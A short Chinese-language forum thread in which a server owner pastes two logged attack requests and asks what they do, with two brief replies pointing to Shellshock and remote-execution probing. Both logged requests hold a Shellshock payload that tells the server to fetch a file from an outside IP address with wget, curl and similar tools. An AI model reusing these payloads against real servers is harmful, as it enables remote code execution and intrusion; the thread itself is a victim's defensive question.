请问这个远程攻击是干么作用的?

1xx.2xx.2xx.1xx/1.1 Match1:{ :;};/usr/bin/perl -e 'print .content-type: text/plain.r.n.r.nxsuccess!.;system(.wget http://46.38.251.16/favicon.icon;curl http://46.38.251.16/favicon.icon;get http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.icon;lynx http://46.38.251.16/favicon.icon .);'

还有一次攻击是下面的代码:

1xx.2xx.2xx.1xx/cgi-bin/php Match1:{ :;};/usr/bin/perl -e 'print .content-type: text/plain.r.n.r.nxsuccess!.;system(.wget http://46.38.251.16/favicon.icon;curl http://46.38.251.16/favicon.icon;get http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.icon;lynx http://46.38.251.16/favicon.icon .);'

1xx.2xx.2xx.1xx是我的服务器地址请问这两次攻击是想干么呢?
谢谢

共 2 个回复


ty4z2008

这个是在做文件探测,检测是否能远程执行文件

# 0

mengzhuo

搜 shellshock

# 1